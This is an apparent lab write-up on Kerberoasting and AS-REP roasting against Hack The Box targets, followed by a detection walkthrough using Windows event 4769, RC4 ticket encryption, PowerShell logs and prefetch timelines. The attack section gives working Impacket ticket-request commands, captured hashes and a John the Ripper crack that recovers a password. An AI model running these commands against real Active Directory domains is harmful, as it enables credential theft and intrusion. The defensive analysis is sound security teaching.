Kerberosting Basics

Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.

When you want to authenticate to some service using Kerberos, you contact the DC and tell it to which system service you want to authenticate. It encrypts a response to you with the service user’s password hash. You send that response to the service, which can decrypt it with it’s password, check who you are, and decide it if wants to let you in.

In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you will use off-line brute force to crack the password associated with the service.

Most of the time you will need an active account on the domain in order to initial Kerberoast, but if the DC is configured with UserAccountControl setting “Do not require Kerberos preauthentication” enabled, it is possible to request and receive a ticket to crack without a valid account on the domain.

Method-1

Now let's get the SPNs. The script identified a user, Administrator:

┌──(kali㉿kali)-[~/Desktop]
└─$ locate GetUserSPNs.py                                                                             
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-07-21 02:36:10.518169             



[-] CCache file is not found. Skipping...

So, we have a ticket. Now, lets crack it with john.

┌──(kali㉿kali)-[~/Desktop]
└─$ john -w=/usr/share/wordlists/rockyou.txt GetUserSPNs.out 
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:11 DONE (2023-07-22 10:07) 0.08673g/s 913917p/s 913917c/s 913917C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Method-2

We also have another script in Impacket that we can directly run without providing username and we get the hash.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/                     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-07-28 12:45:03.309423  2023-07-28 12:44:55.272027  0x410200 



[email protected]:caf2f3add954f9ac9f9b3e7a3d391bc4$db3f3fbc72a599266f8fa30d31498245fe3d01211185557a282f2d40e544ff92fddd7fb472a89bf67eee3556c662e4df672e24d4a2a03c1ab3eee44ed74cba22473993f8284916b09a768cb68beee16973cf493fab978d6befaee38f69418f23dc477cb37f8d28655eb4c0dc6a61ce9e9a520f6a423571540c379c06c0abcb29ce7b7a6b884f155e7548a67023d362fdd3028695cc3f7ffc45af8f97eac9f4ed3a6c85579151db03a78ff4970d252e9029fd5d4bca6513dd8ab2934cc2ad7369a489997b7c7ad288fa00454f47bc803e5f465b429d3e301069d700d468a2ebe291ccf36025b4

If we have potential usernames, we can also use that wordlist to fetch hash value.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt  htb.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:301c9624aa2bd72f0676f909bb8ed6d7$f8930992b43a7465445dc7580a9698908b172b1b53cb2f101f3fcd67a40f3bb2f52ab4e73f97521f338c59d483dfe889ca8a2f98fd23956bd2a4ecf37bf401b64b27838a094cbb8ceb266d1acb6b469f7b6c6cff984daa9d12ea949db6a55041e9956b8d969cc1ea5c2e7518a6e5aaaecd24e4337a5cae197e5e156d0010689f7b3dac8873053c000a0a30de30223274338b8dee02d4673dee6c81670e8a2377fda9baa3caf32d54f3d51ca3ea14cceeeb99fda5da1829535888da9d8e61d79e030137a2e995202ea4ecc9e4f3c215054f2e303037b51f2e5e0a1b07e0a26a1682316a0b1ded
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User l0v3 doesn't have UF_DONT_REQUIRE_PREAUTH set

_______________________________________________________________

Detecting Kerberosting Attack

We have prefetch files and event viewer for the sherlock.

C:\Users\Hp\Downloads\Compressed\PECmd\PECmd.exe -d "C:\Users\Hp\Downloads\campfire-1\Triage\Workstation\2024-05-21T033012_triage_asset" --csv . --csvf output.csv

Analyzing Domain Controller Security Logs

Open the event file of the domain controller.

Filter by the event ID

We still get a lot of events.

Understanding kerberos ticket request

Here we can see that Account Name “DC01$” requested a service ticket for service named DC01$. In Windows names ending with $ are typically service accounts and machine accounts. Similarly, the DC01$ service is related to that service account.

This all belongs to normal Active Directory operations. Below that we can see an option named “Ticket Encryption type” with the value of 0x12 which equals to “AES256-CTS-HMAC-SHA1-96 ”.

In legitimate use cases for Kerberos ticket operations, the encryption type would be 0x12 or 0x11.

But if we see an encryption type “0x17” which is RC4 encryption, that would be a clue to look into this further, as an attacker may request a ticket in this encryption type because it allows them to crack the password.

All major open-source tools, like Impacket and Rubeus, request tickets in RC4 encryption type.

To further reduce the chances of false positives, we can filter out requests from other service accounts and machine accounts.

Service accounts request service tickets from domain controllers all the time; that’s the nature of how service accounts work. To further reduce the events to investigate, we can filter out requests from service names starting with “$”—they are computer accounts or other service account-related services that Windows uses as part of its operations.

We can search for the 0x17 encryption type and events.

We can see that a domain Account “alonzo.spire” requested a ticket for a service name “MSSQLService” with an encryption type of 0x17 from a workstation with IP Address 172.17.79.129.

Notice that both the account name and service name do not end with $.

For SIEMS

SOC analysts can query the logs in SIEMs to create a filter for all the things mentioned.

With the filters discussed above we’re snooping for a 4769 event where:

1. Account name that is NOT a service or machine account (ending with $), so any normal domain user account (this would be the account which is compromised and from which the attacker performed this attack.)

2. Service Names that do NOT end with $.

3. Ticket encryption type will be 0x17 which is RC4 encryption, allowing attackers to easily crack the hash.

The follow-up to this detection would be to:

1. Create a timeline of when this event was generated.

2. Do a forensic analysis of the machine with IP Address 172.17.79.129, and find out how the “alonzo.spire” user account got compromised.

3. We can use artifacts like Process Logs from Sysmon if available, prefetch, lnk files, Managed File Transfer (MFT), or registry to gain insights on what occurred around the time when Kerberoasting activity was noticed.

Analyzing Power shell logs

we can see executed commands/scripts by filtering for event ID 4104.

we can look into the events and see that powerview has been used.

Exploring Timeline

Now we can use Timeline Explorer to look into the actual timeline of the event. we can use the csv file generated from prefetch files.

We should look for any execution around the timeline we established so far. Let's filter for the date of the incident to reduce the noise. We add the filter for the "Last Run" field

Looking at the last run timestamps, we find an exe was executed just a second before our malicious events were logged on the Domain Controller.

This is a Kerberos abuse tool. One that's common in Active Directory pentesting or offensive operations. To get the full path of the file, go to the files loaded and double-click to see all files loaded by this tool at execution.

You can check the last run column to see when was the tool actually run.